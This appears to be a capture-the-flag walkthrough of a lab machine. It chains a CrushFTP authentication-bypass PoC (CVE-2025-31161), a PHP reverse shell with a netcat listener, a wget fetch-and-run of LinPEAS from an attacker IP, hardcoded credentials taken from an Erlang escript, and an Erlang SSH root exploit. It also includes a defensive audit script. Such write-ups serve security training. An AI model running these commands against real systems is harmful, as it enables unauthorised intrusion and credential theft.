Enumeration
Starting with a service scan:
sudo nmap -sV 10.129.66.245 -oN firstscan.txt
Key Findings
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.13
80/tcp open http nginx 1.18.0 (Ubuntu)
Only two ports are open: SSH and HTTP. Let's focus on the web service.
Web Enumeration
The website appears to be a dating platform allowing users to create accounts and upload images.
Initial Testing
Attempted to upload a PHP reverse shell disguised as an image, but discovered:
- Uploaded filenames are automatically changed by backend processing
- Images cannot be directly accessed
- Security measures are stripping potentially malicious content
Moving on to subdomain enumeration.
Subdomain Discovery
Using ffuf to discover subdomains:
ffuf -u http://soulmate.htb/ -H "Host: FUZZ.soulmate.htb" \
-w /usr/share/dirb/wordlists/big.txt -fw 4
Found: ftp.soulmate.htb
Added to /etc/hosts and navigated to the subdomain, which reveals CrushFTP WebInterface.
CrushFTP Authentication Bypass - CVE-2025-31161
The CrushFTP interface has no account creation option, only password reset functionality. Research reveals a recent authentication bypass vulnerability.
Exploitation
Cloning the public PoC:
git clone https://github.com/Immersive-Labs-Sec/CVE-2025-31161
cd CVE-2025-31161
Running the exploit to create a new administrative user:
python cve-2025-31161.py --target_host ftp.soulmate.htb \
--port 80 \
--target_user root \
--new_user pj \
--password pj131pj
Output:
[+] Preparing Payloads
[-] Warming up the target
[+] Sending Account Create Request
[!] User created successfully
[+] Exploit Complete you can now login with
[*] Username: pj
[*] Password: pj131pj.
Successfully authenticated to the CrushFTP interface!
Initial Access
User Enumeration
In the CrushFTP admin panel, found several users:
- ben: Multiple shares, including the webProd folder
- jenna: One folder called departments
- crushadmin: No accessible shares
Getting a Shell
Changed ben’s password via the admin panel and uploaded a PHP reverse shell to the webProd folder.
Using PentestMonkey’s PHP reverse shell:
# Modified with attacker IP and port
# Uploaded to webProd folder
Setup netcat listener:
nc -lvnp 4444
Triggered the shell by navigating to http://soulmate.htb/pj131.php
Caught callback as www-data!
Privilege Escalation to User
Enumeration with LinPEAS
Transferred and executed LinPEAS on the target:
# On target
wget http://10.10.14.x/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
Key Finding - Erlang SSH Daemon
LinPEAS discovered an interesting Erlang process:
root 1146 /usr/local/lib/erlang_login/start.escript
Examining the script revealed hardcoded credentials:
cat /usr/local/lib/erlang_login/start.escript
Found credentials in the escript:
{user_passwords, [{"ben", "HouseH0ldings998"}]}
The script runs an SSH daemon on port 2222 (localhost only) with ben’s credentials.
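From the defender's side, the finding above is a hardcoded `{user_passwords, [...]}` option passed to Erlang's ssh daemon. The following is an added audit script, not part of this writeup or the machine, that scans escript/config sources for that option and reports each user with a masked password and line number; the sample escript is constructed with placeholder values.

```python
import re
from typing import Dict, List

# Constructed sample resembling the escript option block described above
# (placeholder values, not the machine's real credentials).
SAMPLE_ESCRIPT = """
#!/usr/bin/env escript
main(_) ->
    ssh:daemon({127,0,0,1}, 2222, [
        {system_dir, "/usr/local/lib/erlang_login/ssh"},
        {user_passwords, [{"ben", "EXAMPLE_PASSWORD_1"},
                          {"svc", "EXAMPLE_PASSWORD_2"}]},
        {auth_methods, "password"}
    ]),
    receive stop -> ok end.
"""

# Matches the {user_passwords, [...]} option list of ssh:daemon/3.
USER_PASSWORDS_RE = re.compile(r'\{user_passwords,\s*\[(.*?)\]\s*\}', re.DOTALL)
# Matches each {"user", "password"} tuple inside that list.
TUPLE_RE = re.compile(r'\{\s*"([^"]*)"\s*,\s*"([^"]*)"\s*\}')


def mask(secret: str) -> str:
    """Keep only the length and first character so reports never echo the secret."""
    if not secret:
        return "<empty>"
    return secret[0] + "*" * (len(secret) - 1)


def find_hardcoded_erlang_passwords(text: str) -> List[Dict[str, object]]:
    """Return every user_passwords entry found in an escript/config source.

    Each result carries the user name, a masked password and the 1-based line
    number, which is what a config-audit or CI check needs to flag the finding.
    """
    findings = []
    for block in USER_PASSWORDS_RE.finditer(text):
        for t in TUPLE_RE.finditer(block.group(1)):
            # Absolute offset of the tuple = start of the captured list + offset inside it.
            line_no = text.count("\n", 0, block.start(1) + t.start()) + 1
            findings.append({"user": t.group(1),
                             "password_masked": mask(t.group(2)),
                             "line": line_no})
    return findings


if __name__ == "__main__":
    for f in find_hardcoded_erlang_passwords(SAMPLE_ESCRIPT):
        print(f"line {f['line']}: user={f['user']} password={f['password_masked']}")
```

Running it over /usr/local/lib/erlang_login/*.escript (or any Erlang config directory) gives an inventory of password-authenticated daemon accounts to rotate or move to key-based auth.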
SSH as Ben
Using password: HouseH0ldings998
User flag obtained:
2c68340e4b8a7f3966664368a6af78fd
Privilege Escalation to Root
Erlang SSH Daemon Exploitation
Based on the escript configuration, ben can SSH to the local Erlang daemon on port 2222:
ssh ben@localhost -p 2222
This drops us into an Erlang shell:
Eshell V15.2.5 (press Ctrl+G to abort, type help(). for help)
(ssh_runner@soulmate)1>
Vulnerability Research
Found an OffSec article outlining an Erlang SSH privilege escalation vulnerability with a GitHub PoC.
Downloaded and executed the exploit, successfully escalating to root!
Key Takeaways
- Subdomain enumeration revealed the CrushFTP installation
- CVE-2025-31161 allowed authentication bypass and admin access to CrushFTP
- Credential discovery in Erlang startup scripts provided user access
- Erlang SSH daemon vulnerability enabled privilege escalation to root
- Always check application-specific configuration files for hardcoded credentials
Tools Used
- nmap
- ffuf
- CVE-2025-31161 PoC
- LinPEAS
- PHP reverse shell
- Erlang SSH exploit